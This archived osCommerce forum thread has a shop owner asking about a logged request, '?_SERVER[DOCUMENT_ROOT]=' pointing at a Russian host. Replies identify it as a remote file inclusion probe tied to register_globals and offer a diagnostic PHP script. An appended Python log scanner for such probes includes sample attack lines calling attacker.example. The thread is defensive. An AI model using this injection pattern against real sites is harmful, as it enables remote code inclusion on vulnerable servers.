rocdy Posted October 16, 2009

Can anyone tell me what this is for: //?_SERVER[DOCUMENT_ROOT]=http://www.hostmann-steinberg.ru/x?

I found it in my Who Is Online URL. Someone put that URL several times in my site when opening my index page and category page. Is that some hack?

Rocdy
Beginner in php programming and still learning from this forums. Special thanks for Oscommerce Community Forums that help me a lot. :-)
BryceJr Posted October 16, 2009

You have been hacked. If you know what you're looking for, clean all files. Preferably, delete your site files and restore from a clean backup.

Read and apply security fixes: "How to Secure your site", "Securing Admin".

Also, delete "File_Manager.php" from admin.
FIMBLE Posted October 16, 2009

Hi, look over your page source to see if there are any unexpected links or code. Check some php files to see if any code has been added; I would not think there was, it seems someone is testing rather than actually in. Check your server error logs to see the recent errors.

What is your URL? I will have a look over your source code.

Nic
Sometimes you're the dog and sometimes the lamp post
rocdy Posted October 16, 2009 (Author)

> Hi, look over your page source to see if there are any unexpected links or code. Check some php files to see if any code has been added; I would not think there was, it seems someone is testing rather than actually in. Check your server error logs to see the recent errors.
> What is your URL? I will have a look over your source code.
> Nic

My site is www.bnetb-tanahabang.com

I have already installed site monitor, htacc protection, IP Trap, saver database input, and security pro. I have checked with site monitor and nothing has changed in my files. It has appeared since this morning (in my country); after several minutes it came again and again. I have already checked my php files in the root directory; nothing changed. Maybe someone outside just wants to try playing around with my website.

Rocdy
FIMBLE Posted October 16, 2009

Your source looks OK. Next time you see them trying this, grab the IP number and add it to your banned?IP+Trapped.txt file. They won't be able to bother you with that IP number again.

I seriously doubt you have been hacked as was mentioned in an earlier post; I think it was confused with the eval decode hack going around.

Nic
andy_1984 Posted October 16, 2009

> You have been hacked. If you know what you're looking for, clean all files. Preferably, delete your site files and restore from a clean backup. Read and apply security fixes. How to Secure your site Securing Admin Also, delete "File_Manager.php" from admin.

And your diagnosis is based on what exactly??? An explanation would be nice, as you obviously seem to know he's been hacked, so you must have some prior knowledge regarding this server_root thing, which btw was also asked about yesterday on here. And you would also know that applying oscommerce security will do sweet nothing as it's a php problem... that is, if this server_root thing even is a problem and not just some random mistake or error.

See here: http://www.oscommerce.com/forums/topic/346894-need-advice-for-some-weird-last-url-in-who-is-online/

The conclusion is that if register globals is turned off there isn't a problem. So you must know register globals is on and the site got hacked because it's so damn obvious.

Sorry buddy, I know you have been a member here for a few years, but that was god awful advice and, to be honest, possibly scaring the crap out of a member.

rocdy, check and see if register globals is on. Check the URL at the end of that server_root thing. Did you replace whatever was at x? I would be interested to know, as it appears, and I repeat "Appears", to be used for executing malicious code via a vulnerability in php 4.2 and lower. If we know what it is trying to execute, that would be the first place to start looking for any problems. As I said, nothing to do with oscommerce, it's php.

If register globals is off I wouldn't worry too much, but for your own peace of mind read about this exploit and investigate what the URL is trying to do.
FIMBLE Posted October 16, 2009

Hi Andrew,

I think that BryceJR got confused between the Eval decode64 hack going around, possibly speed-read the post; his answers are usually of a high standard. This time I'm sure he made an error, which all of us do.

Nic
rocdy Posted October 17, 2009 (Author)

> Your source looks OK. Next time you see them trying this, grab the IP number and add it to your banned?IP+Trapped.txt file. They won't be able to bother you with that IP number again.
> I seriously doubt you have been hacked as was mentioned in an earlier post; I think it was confused with the eval decode hack going around.
> Nic

Thanks for the reply. I will do what you tell me to prevent that IP from coming again.

Thanks to all of you who gave me some information about this hack.

Best regards.
Rocdy
BryceJr Posted October 17, 2009

@rocdy: I'm glad you were able to sort things out.

@andy_1984: My apologies, I didn't mean to get you all upset.

> and your diagnosis is based on what exactly ???

The answer is:

> Some one put that url several time in my site when open my index page and category page.

If rocdy did not do it, who could it be? Tooth fairy? Harry Potter?

> explanation would be nice as you obviously seem to know hes been hacked so you must have some prior knowledge regarding this server_root thing

No, not really. I don't have any explanation. I'm working on information given on the original post. Anything after that is hindsight.

> sorry buddy i know you have been a member here for a few years but that was god awful advice and to be honest possibly scaring the crap out of a member

Getting hacked is a bad thing. Cleaning up after a hack is very tedious, especially if a clean backup doesn't exist. "What?! You want me to start over from scratch?!" Now, that's scary.

@Nick: Yes, I did suspect "Eval decode64" hack. It was a possibility. There have been numerous posts on that hack for the past several weeks.
FWR Media Posted October 17, 2009

> Can any one tell me what is this for //?_SERVER[DOCUMENT_ROOT]=http://www.hostmann-steinberg.ru/x? I found it's in my Who Is Online URL. Some one put that url several time in my site when open my index page and category page. Are that is some hack?

This looks to me like a script kiddie taking his chances at injecting a bad URI into the $_SERVER['DOCUMENT_ROOT'] predefined variable. This doesn't mean you have been successfully hacked; it just means that someone or something was trying.

This injection technique has obviously worked historically because I have seen examples of it on the web, usually related to register_globals being on and perhaps with extract being used wrongly in the script.

However, my tests on later versions of PHP 4.4.X and PHP 5.X show this method not to work, so perhaps it was just earlier versions of PHP.

You could try the following if you are concerned: save the following file in your shop root as doc_root.php, then access the file using

<my web address>/doc_root.php?_SERVER[DOCUMENT_ROOT]=http://www.mysite.com

If the two printouts contain your site path and not http://www.mysite.com then you seem to be safe from this particular technique.

```php
<?php
// Diagnostic only: shows whether a query-string parameter can overwrite DOCUMENT_ROOT.
include_once 'includes/application_top.php';

// Escape the values so an injected parameter is shown as text, not rendered as HTML.
echo '$_SERVER[\'DOCUMENT_ROOT\'] = ' . htmlspecialchars($_SERVER['DOCUMENT_ROOT']) . '<br />' . PHP_EOL;
echo '$DOCUMENT_ROOT = ' . htmlspecialchars($DOCUMENT_ROOT) . '<br />' . PHP_EOL;

include_once 'includes/application_bottom.php';
?>
```

DELETE THE FILE AFTER USE, IT IS A VULNERABILITY.

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls
KissMT Dynamic SEO Meta & Canonical Header Tags
KissER Error Handling and Debugging
KissIT Image Thumbnailer
Security Pro - Querystring protection against hackers ( a KISS contribution )
If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work.
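An added example, not part of any post above and not osCommerce or Security Pro code: the thread's advice to check the server logs and collect the probing IP, written as a Python scan of an access log for query parameters that name a PHP superglobal. It assumes Apache combined log format; the log lines, IP addresses and the attacker.example host are constructed sample data.

```python
import re
from urllib.parse import parse_qsl

# Arrays PHP fills in itself; a client has no reason to send them as parameters.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_FILES", "_ENV", "_REQUEST", "_SESSION"}
# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:[A-Z]+) (\S+) [^"]*" (\d{3})')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)  # value points at a remote file

def superglobal_params(target):
    """Return decoded (name, value) pairs whose base name is a PHP superglobal."""
    # Split on the first '?' by hand: a target such as '//?x=1' confuses URL parsers.
    query = target.partition("?")[2]
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        # PHP turns '.' and ' ' in parameter names into '_', so normalise first.
        base = key.split("[", 1)[0].replace(".", "_").replace(" ", "_")
        if base in SUPERGLOBALS:
            hits.append((key, value))
    return hits

def scan(lines):
    """Map client IP -> list of findings for requests that try to set a superglobal."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        for key, value in superglobal_params(target):
            findings.setdefault(ip, []).append({
                "param": key, "value": value,
                "remote": bool(REMOTE_RE.match(value)), "status": int(status)})
    return findings

# Constructed sample log: two probes (plain and URL-encoded) and two normal requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Oct/2009:08:14:02 +0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://attacker.example/x? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Oct/2009:08:19:40 +0700] "GET /index.php?cPath=3&_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fattacker.example%2Fx%3F HTTP/1.1" 200 5310',
    '198.51.100.20 - - [16/Oct/2009:08:20:11 +0700] "GET /product_info.php?products_id=12 HTTP/1.1" 200 7421',
    '198.51.100.21 - - [16/Oct/2009:08:21:00 +0700] "GET /index.php?server=_SERVER HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, len(hits), "probe(s):", sorted({h["param"] for h in hits}))
```

A 200 status on a flagged line only means the page was served; whether the parameter had any effect depends on register_globals and the PHP version, as discussed in the thread.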
Archived
This topic is now archived and is closed to further replies.